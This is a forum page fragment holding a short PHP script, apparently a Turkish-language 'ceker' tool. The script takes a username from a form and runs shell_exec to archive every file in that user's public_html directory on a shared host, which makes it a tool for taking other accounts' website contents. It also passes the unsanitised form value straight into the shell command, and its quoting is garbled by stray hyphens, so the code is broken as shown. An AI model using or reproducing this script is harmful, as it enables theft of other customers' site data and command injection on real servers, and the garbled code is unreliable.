Follow along with the video below to see how to install our site as a web app on your home screen.
Not: This feature may not be available in some browsers.
<?php
ob_start();
set_time_limit(0);
class ceker{
public function script($hedef){
$phpself=dirname(__FILE__);
$cek=shell_exec("cd /home/-.$hedef.-/public_html/;tar cvzf -.$phpself.-/-.$hedef.-.tar.gz *-);
echo --.$hedef.-.tar.gz-;
ob_flush();
flush();
}
}
if(isset($_POST['submit'])){
$ceker=new ceker();
$ceker->script($_POST['user']);
}
?>